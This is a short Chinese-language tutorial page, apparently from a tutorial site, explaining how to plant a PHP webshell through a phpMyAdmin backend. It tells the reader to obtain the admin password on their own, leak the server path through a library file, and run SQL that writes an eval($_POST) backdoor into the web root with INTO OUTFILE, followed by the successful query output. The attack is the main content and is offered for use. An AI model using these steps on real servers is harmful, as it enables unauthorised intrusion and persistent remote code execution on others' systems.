明輝手游網(wǎng)中心:是一個免費提供流行視頻軟件教程、在線學(xué)習(xí)分享的學(xué)習(xí)平臺!

教你phpMyAdmin 后臺拿webshell

[摘要]1.如何拿到登陸密碼,自己想辦法。 2.訪問 : http://url/phpmyadmin/libraries/select_lang.lib.php 得到物理路徑. 3.選擇一個Database...

1.如何拿到登陸密碼,自己想辦法。
2.訪問 : http://url/phpmyadmin/libraries/select_lang.lib.php 得到物理路徑.
3.選擇一個Database.運行以下語句.
----start code---
Create TABLE a (cmd text NOT NULL);
Insert INTO a (cmd) VALUES('<?php eval($_POST[1]);?>');
select cmd from a into outfile 'F:/Program Files/Apache Group/Apache2/htdocs/phpMyAdmin/d.php/d.php';
Drop TABLE IF EXISTS a;
----end code---
4.如果沒什么意外.對應(yīng)網(wǎng)站得到webshell

您運行的 SQL 語句已經(jīng)成功運行了。
SQL 查詢:
CREATE TABLE a(
cmd text NOT NULL
);# MySQL 返回的查詢結(jié)果為空(即零行)。
INSERT INTO a( cmd )
VALUES (
'<?php eval($_POST[1]);?>'
);# 影響列數(shù): 1
SELECT cmd
FROM a
INTO OUTFILE 'F:/Program Files/Apache Group/Apache2/htdocs/phpMyAdmin/d.php';# 影響列數(shù): 1
DROP TABLE IF EXISTS a;# MySQL 返回的查詢結(jié)果為空(即零行)。


上面是電腦上網(wǎng)安全的一些基礎(chǔ)常識,學(xué)習(xí)了安全知識,幾乎可以讓你免費電腦中毒的煩擾。